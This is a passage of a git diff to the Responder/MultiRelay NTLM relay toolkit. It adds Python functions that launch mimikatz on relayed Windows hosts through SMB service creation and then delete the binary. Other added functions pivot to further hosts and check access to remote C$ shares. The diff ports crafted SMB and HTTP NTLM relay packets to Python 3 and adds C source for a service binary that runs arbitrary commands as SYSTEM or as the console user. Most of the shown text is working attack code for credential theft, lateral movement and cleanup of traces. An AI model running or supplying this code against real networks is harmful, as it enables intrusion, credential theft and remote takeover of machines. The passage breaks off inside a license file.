"\\svcctl", data, s) + data,s,f = StopAndDeleteService(Command, MimiKatzSVCName, MimiKatzSVCID, f, Host, data, s) + data,s = CloseFID(f, data,s) + #Short sleep, to make sure the service had the time needed to stop before deleting mimikatz + time.sleep(0.5) + data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) + + Logs.info('Command executed:') + Logs.info(clientIP+","+Username+','+Command) + + return ModifySMBRetCode(data) + except: + #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. + print("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.") + return ModifySMBRetCode(data) + +##########Pivot############# +def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath, RunAsFileName): + + try: + LocalIp = FindLocalIp() + WinTmpPath = "%windir%\\Temp\\log.txt" + Command = RunAsPath+" \"dir \\\\"+LocalIp+"\\C$\" \""+WinTmpPath+"\"" + ServiceNameChars = GenerateServiceName() + ServiceIDChars = GenerateServiceID() + data,s = SMBOpenPipe(Host, data, s) + data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) + data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s) + data,s = CloseFID(f, data,s) + + ## We're leaving this host, clean it up.. + data = DeleteFile(data, s, "\\Windows\\Temp\\"+RunAsFileName, Host) + Logs.info('Command executed:') + Logs.info(clientIP+","+Username+','+Command) + return data + + except: + #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. + print("[+] Something went wrong, try something else.") + return ModifySMBRetCode(data) + +##########VerifyPivot############# +def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPath, RunAsFileName): + + try: + RandomFName = GenerateRandomFileName() + ServiceNameChars = GenerateServiceName() + ServiceIDChars = GenerateServiceID() + WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt" + LogFile = "\\Windows\\Temp\\"+RandomFName+".txt" + Command = RunAsPath+" \"dir \\\\"+Pivot+"\\C$\" \""+WinTmpPath+"\"" + + data,s = SMBOpenPipe(Host, data, s) + data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) + data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s) + data,s = CloseFID(f, data,s) + time.sleep(1) + data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s) + data,s,Output = ReadAndDelete(f, LogFile, data, s) + data = DeleteFile(data, s, "\\Windows\\Temp\\"+RunAsFileName, Host) + + Logs.info('Command executed:') + Logs.info(clientIP+","+Username+','+Command) + + if re.findall('Volume in drive', Output): + return True, data + else: + return False, data + + except: + #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. + print("[+] Something went wrong, try something else.") + return ModifySMBRetCode(data) + +##########DoSomethingDumb############# +def DumbSMBChain(data, s, Host): + try: + File = "/Windows/win.ini" + File = File.replace("/","\\") + data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) + data,s,Output = GrabAndRead(f, File, data, s) + data, s = CloseTID(data, s) + return ModifySMBRetCode(data) ##Command was successful, ret true. + + except: + return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. diff --git a/tools/MultiRelay/RelayMultiPackets.py b/tools/MultiRelay/RelayMultiPackets.py index cedcaaf..095059b 100644 --- a/tools/MultiRelay/RelayMultiPackets.py +++ b/tools/MultiRelay/RelayMultiPackets.py @@ -1,5 +1,6 @@ #!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools +# -*- coding: latin-1 -*- +# This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com # This program is free software: you can redistribute it and/or modify @@ -16,24 +17,39 @@ # along with this program. If not, see . import struct import os +import sys from odict import OrderedDict import datetime from base64 import b64decode, b64encode +# Packet class handling all packet generation (see odict.py). class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) +#Python version +if (sys.version_info > (3, 0)): + PY2OR3 = "PY3" +else: + PY2OR3 = "PY2" + +def StructWithLenPython2or3(endian,data): + #Python2... + if PY2OR3 == "PY2": + return struct.pack(endian, data) + #Python3... + else: + return struct.pack(endian, data).decode('latin-1') ##################HTTP Proxy Relay########################## def HTTPCurrentDate(): @@ -42,178 +58,176 @@ def HTTPCurrentDate(): #407 section. class WPAD_Auth_407_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"), - ("Connection", "Proxy-Connection: close\r\n"), - ("Cache-Control", "Cache-Control: no-cache\r\n"), - ("Pragma", "Pragma: no-cache\r\n"), - ("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) + fields = OrderedDict([ + ("Code", "HTTP/1.1 407 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"), + ("Connection", "Proxy-Connection: close\r\n"), + ("Cache-Control", "Cache-Control: no-cache\r\n"), + ("Pragma", "Pragma: no-cache\r\n"), + ("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) class WPAD_NTLM_Challenge_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWWAuth", "Proxy-Authenticate: NTLM "), - ("Payload", ""), - ("Payload-CRLF", "\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) + fields = OrderedDict([ + ("Code", "HTTP/1.1 407 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWWAuth", "Proxy-Authenticate: NTLM "), + ("Payload", ""), + ("Payload-CRLF", "\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) - def calculate(self,payload): - self.fields["Payload"] = b64encode(payload) + def calculate(self,payload): + self.fields["Payload"] = b64encode(payload) #401 section: class IIS_Auth_401_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) + fields = OrderedDict([ + ("Code", "HTTP/1.1 401 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) class IIS_Auth_Granted(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), - ("ContentLen", "Content-Length: "), - ("ActualLen", "76"), - ("CRLF", "\r\n\r\n"), - ("Payload", "\n\n\n\nLoading\n\n\n"), - ]) - def calculate(self): - self.fields["ActualLen"] = len(str(self.fields["Payload"])) + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", "\n\n\n\nLoading\n\n\n"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) class IIS_NTLM_Challenge_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWWAuth", "WWW-Authenticate: NTLM "), - ("Payload", ""), - ("Payload-CRLF", "\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) + fields = OrderedDict([ + ("Code", "HTTP/1.1 401 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWWAuth", "WWW-Authenticate: NTLM "), + ("Payload", ""), + ("Payload-CRLF", "\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) - def calculate(self,payload): - self.fields["Payload"] = b64encode(payload) + def calculate(self,payload): + self.fields["Payload"] = b64encode(payload) class IIS_Basic_401_Ans(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("Type", "Content-Type: text/html\r\n"), - ("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"), - ("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"), - ("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), - ]) + fields = OrderedDict([ + ("Code", "HTTP/1.1 401 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"), + ("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"), + ("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) ##################WEBDAV Relay Packet######################### class WEBDAV_Options_Answer(Packet): - fields = OrderedDict([ - ("Code", "HTTP/1.1 200 OK\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"), - ("Connection", "Connection: Keep-Alive\r\n"), - ("Content-Type", "Content-Type: text/html\r\n"), - ("CRLF", "\r\n"), - ]) + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"), + ("Connection", "Connection: Keep-Alive\r\n"), + ("Content-Type", "Content-Type: text/html\r\n"), + ("CRLF", "\r\n"), + ]) ##################SMB Relay Packet############################ def midcalc(data): #Set MID SMB Header field. - return data[34:36] + return data[34:36].decode('latin-1') def uidcalc(data): #Set UID SMB Header field. - return data[32:34] + return data[32:34].decode('latin-1') def pidcalc(data): #Set PID SMB Header field. - pack=data[30:32] - return pack + return data[30:32].decode('latin-1') def tidcalc(data): #Set TID SMB Header field. - pack=data[28:30] - return pack + return data[28:30].decode('latin-1') #Response packet. class SMBRelayNegoAns(Packet): - fields = OrderedDict([ - ("Wordcount", "\x11"), - ("Dialect", ""), - ("Securitymode", "\x03"), - ("MaxMpx", "\x32\x00"), - ("MaxVc", "\x01\x00"), - ("MaxBuffSize", "\x04\x41\x00\x00"), - ("MaxRawBuff", "\x00\x00\x01\x00"), - ("SessionKey", "\x00\x00\x00\x00"), - ("Capabilities", "\xfd\xf3\x01\x80"), - ("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"), - ("SrvTimeZone", "\xf0\x00"), - ("KeyLen", "\x00"), - ("Bcc", "\x10\x00"), - ("Guid", os.urandom(16)), - ]) + fields = OrderedDict([ + ("Wordcount", "\x11"), + ("Dialect", ""), + ("Securitymode", "\x03"), + ("MaxMpx", "\x32\x00"), + ("MaxVc", "\x01\x00"), + ("MaxBuffSize", "\x04\x41\x00\x00"), + ("MaxRawBuff", "\x00\x00\x01\x00"), + ("SessionKey", "\x00\x00\x00\x00"), + ("Capabilities", "\xfd\xf3\x01\x80"), + ("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"), + ("SrvTimeZone", "\xf0\x00"), + ("KeyLen", "\x00"), + ("Bcc", "\x10\x00"), + ("Guid", os.urandom(16).decode('latin-1')), + ]) ##Response packet. class SMBRelayNTLMAnswer(Packet): - fields = OrderedDict([ - ("Wordcount", "\x04"), - ("AndXCommand", "\xff"), - ("Reserved", "\x00"), - ("Andxoffset", "\x5f\x01"), - ("Action", "\x00\x00"), - ("SecBlobLen", "\xea\x00"), - ("Bcc", "\x34\x01"), - ###NTLMPACKET - ("Data", ""), - ###NTLMPACKET + fields = OrderedDict([ + ("Wordcount", "\x04"), + ("AndXCommand", "\xff"), + ("Reserved", "\x00"), + ("Andxoffset", "\x5f\x01"), + ("Action", "\x00\x00"), + ("SecBlobLen", "\xea\x00"), + ("Bcc", "\x34\x01"), + ###NTLMPACKET + ("Data", ""), + ###NTLMPACKET - ]) + ]) #Request packet (no calc): class SMBSessionSetupAndxRequest(Packet): - fields = OrderedDict([ - ("Wordcount", "\x0c"), - ("AndXCommand", "\xff"), - ("Reserved","\x00" ), - ("AndXOffset", "\xec\x00"), - ("MaxBuff","\xff\xff"), - ("MaxMPX", "\x32\x00"), - ("VCNumber","\x00\x00"), - ("SessionKey", "\x00\x00\x00\x00"), - ###NTLMPACKET - ("Data", ""), - ###NTLMPACKET - ]) + fields = OrderedDict([ + ("Wordcount", "\x0c"), + ("AndXCommand", "\xff"), + ("Reserved","\x00" ), + ("AndXOffset", "\xec\x00"), + ("MaxBuff","\xff\xff"), + ("MaxMPX", "\x32\x00"), + ("VCNumber","\x00\x00"), + ("SessionKey", "\x00\x00\x00\x00"), + ###NTLMPACKET + ("Data", ""), + ###NTLMPACKET + ]) class SMBSessEmpty(Packet): - fields = OrderedDict([ - ("Empty", "\x00\x00\x00"), - ]) + fields = OrderedDict([ + ("Empty", "\x00\x00\x00"), + ]) ##################SMB Request Packet########################## class SMBHeader(Packet): fields = OrderedDict([ @@ -237,9 +251,9 @@ class SMBNegoCairo(Packet): ("Bcc", "\x62\x00"), ("Data", "") ]) - + def calculate(self): - self.fields["Bcc"] = struct.pack(" 255: - self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" - self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0) + self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" + self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-0) else: - self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" - self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3) + self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" + self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-3) if len(NTLMData)-8 > 255: - self.fields["AsnSecMechLenOfLen"] = "\x82" - self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4) + self.fields["AsnSecMechLenOfLen"] = "\x82" + self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-4) else: - self.fields["AsnSecMechLenOfLen"] = "\x81" - self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6) + self.fields["AsnSecMechLenOfLen"] = "\x81" + self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-6) if len(NTLMData)-12 > 255: - self.fields["ChoosedTagLenOfLen"] = "\x82" - self.fields["ChoosedTagLen"] = struct.pack(">H", len(SecurityBlobLen)-8) + self.fields["ChoosedTagLenOfLen"] = "\x82" + self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-8) else: - self.fields["ChoosedTagLenOfLen"] = "\x81" - self.fields["ChoosedTagLen"] = struct.pack(">B", len(SecurityBlobLen)-9) + self.fields["ChoosedTagLenOfLen"] = "\x81" + self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-9) if len(NTLMData)-16 > 255: - self.fields["ChoosedTag1StrLenOfLen"] = "\x82" - self.fields["ChoosedTag1StrLen"] = struct.pack(">H", len(SecurityBlobLen)-12) + self.fields["ChoosedTag1StrLenOfLen"] = "\x82" + self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-12) else: - self.fields["ChoosedTag1StrLenOfLen"] = "\x81" - self.fields["ChoosedTag1StrLen"] = struct.pack(">B", len(SecurityBlobLen)-12) + self.fields["ChoosedTag1StrLenOfLen"] = "\x81" + self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-12) CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])+str(self.fields["NLMPAuthMsgNull"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["ExtraNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"]) SecurityBlobLenUpdated = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"]) ## Packet len - self.fields["andxoffset"] = struct.pack(""+WinTmpPath+"&exit'" - BinDataLen = str(self.fields["BinCMD"]) - ## Calculate first - self.fields["BinPathMaxCount"] = struct.pack(" +#include +#include + +int wmain(int argc, wchar_t * argv[]); +void WINAPI ServiceMain(DWORD argc, LPWSTR *argv); +void WINAPI ServiceCtrlHandler(DWORD Opcode); + +SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0}; +SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL; +HANDLE m_pyrsvcRunning; +PWCHAR z_cmdLine, z_logFile; +const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1"; + +int wmain(int argc, wchar_t * argv[]) +{ + int status = ERROR_SERVICE_NOT_IN_EXE; + const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}}; + if(argc == 3) + { + if(z_cmdLine = _wcsdup(argv[1])) + { + if(z_logFile = _wcsdup(argv[2])) + { + if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL)) + { + if(StartServiceCtrlDispatcher(DispatchTable)) + status = ERROR_SUCCESS; + else status = GetLastError(); + CloseHandle(m_pyrsvcRunning); + } + free(z_logFile); + } + free(z_cmdLine); + } + } + return status; +} + +void WINAPI ServiceMain(DWORD argc, LPWSTR *argv) +{ + STARTUPINFO si = {0}; + PROCESS_INFORMATION pi; + PWCHAR arguments; + DWORD size; + HANDLE hUser; + LPVOID env; + si.cb = sizeof(STARTUPINFO); + if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler)) + { + m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING; + SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus); + m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; + m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP; + SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus); + + size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR); + if(arguments = (PWCHAR) malloc(size)) + { + memset(arguments, '\0', size); + wcscat_s(arguments, size, PYRSVC_PRE_CMD); + wcscat_s(arguments, size, z_cmdLine); + wcscat_s(arguments, size, PYRSVC_POST_CMD); + wcscat_s(arguments, size, z_logFile); + wcscat_s(arguments, size, PYRSVC_END_CMD); + if(WTSQueryUserToken(WTSGetActiveConsoleSessionId(), &hUser)) + { + if(CreateEnvironmentBlock(&env, hUser, FALSE)) + { + if(CreateProcessAsUser(hUser, NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi)) + { + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); + } + DestroyEnvironmentBlock(env); + } + CloseHandle(hUser); + } + free(arguments); + } + WaitForSingleObject(m_pyrsvcRunning, INFINITE); + m_ServiceStatus.dwCurrentState = SERVICE_STOPPED; + SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus); + } +} + +void WINAPI ServiceCtrlHandler(DWORD Opcode) +{ + if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN)) + { + m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING; + SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus); + SetEvent(m_pyrsvcRunning); + } +} diff --git a/tools/MultiRelay/bin/Syssvc.c b/tools/MultiRelay/bin/Syssvc.c new file mode 100644 index 0000000..3d3c9d6 --- /dev/null +++ b/tools/MultiRelay/bin/Syssvc.c @@ -0,0 +1,90 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : https://creativecommons.org/licenses/by/4.0/ +*/ +#include + +int wmain(int argc, wchar_t * argv[]); +void WINAPI ServiceMain(DWORD argc, LPWSTR *argv); +void WINAPI ServiceCtrlHandler(DWORD Opcode); + +SERVICE_STATUS m_ServiceStatus = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, 0, NO_ERROR, 0, 0, 0}; +SERVICE_STATUS_HANDLE m_ServiceStatusHandle = NULL; +HANDLE m_pyrsvcRunning; +PWCHAR z_cmdLine, z_logFile; +const WCHAR PYRSVC_NAME[] = L"pyrsvc", PYRSVC_PRE_CMD[] = L"cmd.exe /c \"", PYRSVC_POST_CMD[] = L"\" > ", PYRSVC_END_CMD[] = L" 2>&1"; + +int wmain(int argc, wchar_t * argv[]) +{ + int status = ERROR_SERVICE_NOT_IN_EXE; + const SERVICE_TABLE_ENTRY DispatchTable[]= {{(LPWSTR) PYRSVC_NAME, ServiceMain}, {NULL, NULL}}; + if(argc == 3) + { + if(z_cmdLine = _wcsdup(argv[1])) + { + if(z_logFile = _wcsdup(argv[2])) + { + if(m_pyrsvcRunning = CreateEvent(NULL, TRUE, FALSE, NULL)) + { + if(StartServiceCtrlDispatcher(DispatchTable)) + status = ERROR_SUCCESS; + else status = GetLastError(); + CloseHandle(m_pyrsvcRunning); + } + free(z_logFile); + } + free(z_cmdLine); + } + } + return status; +} + +void WINAPI ServiceMain(DWORD argc, LPWSTR *argv) +{ + STARTUPINFO si = {0}; + PROCESS_INFORMATION pi; + PWCHAR arguments; + DWORD size; + si.cb = sizeof(STARTUPINFO); + if(m_ServiceStatusHandle = RegisterServiceCtrlHandler(PYRSVC_NAME, ServiceCtrlHandler)) + { + m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING; + SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus); + m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; + m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP; + SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus); + + size = ((ARRAYSIZE(PYRSVC_PRE_CMD) - 1) + lstrlen(z_cmdLine) + (ARRAYSIZE(PYRSVC_POST_CMD) - 1) + lstrlen(z_logFile) + (ARRAYSIZE(PYRSVC_END_CMD) - 1) + 1) * sizeof(WCHAR); + if(arguments = (PWCHAR) malloc(size)) + { + memset(arguments, '\0', size); + wcscat_s(arguments, size, PYRSVC_PRE_CMD); + wcscat_s(arguments, size, z_cmdLine); + wcscat_s(arguments, size, PYRSVC_POST_CMD); + wcscat_s(arguments, size, z_logFile); + wcscat_s(arguments, size, PYRSVC_END_CMD); + + if(CreateProcess(NULL, arguments, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) + { + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); + } + + free(arguments); + } + WaitForSingleObject(m_pyrsvcRunning, INFINITE); + m_ServiceStatus.dwCurrentState = SERVICE_STOPPED; + SetServiceStatus(m_ServiceStatusHandle, &m_ServiceStatus); + } +} + +void WINAPI ServiceCtrlHandler(DWORD Opcode) +{ + if((Opcode == SERVICE_CONTROL_STOP) || (Opcode == SERVICE_CONTROL_SHUTDOWN)) + { + m_ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING; + SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus); + SetEvent(m_pyrsvcRunning); + } +} diff --git a/tools/MultiRelay/creddump/CHANGELOG b/tools/MultiRelay/creddump/CHANGELOG deleted file mode 100644 index 4c8dfd6..0000000 --- a/tools/MultiRelay/creddump/CHANGELOG +++ /dev/null @@ -1,9 +0,0 @@ -Version: 0.3 Date: 8/1/2012 - -* Fixed LM and NTLM Hash Corruption issue. Thanks to Jonathan Claudius. - Closes Issue 3. - -Version: 0.2 Date: 2/24/2011 - -* Fixed issue with wrong format specifier being used (L instead of I), which -caused creddump to fail on 64-bit systems. diff --git a/tools/MultiRelay/creddump/COPYING b/tools/MultiRelay/creddump/COPYING deleted file mode 100644 index 94a9ed0..0000000 --- a/tools/MultiRelay/creddump/COPYING +++ /dev/null @@ -1,674 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -the GNU General Public License is intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. We, the Free Software Foundation, use the -GNU General Public License for most of our software; it applies also to -any other work released this way by its authors. You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you -these rights or asking you to surrender the rights. Therefore, you have -certain responsibilities if you distribute copies of the software, or if -you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must pass on to the recipients the same -freedoms that you received. You must make sure that they, too, receive -or can get the source code. And you must show them these terms so they -know their rights. - 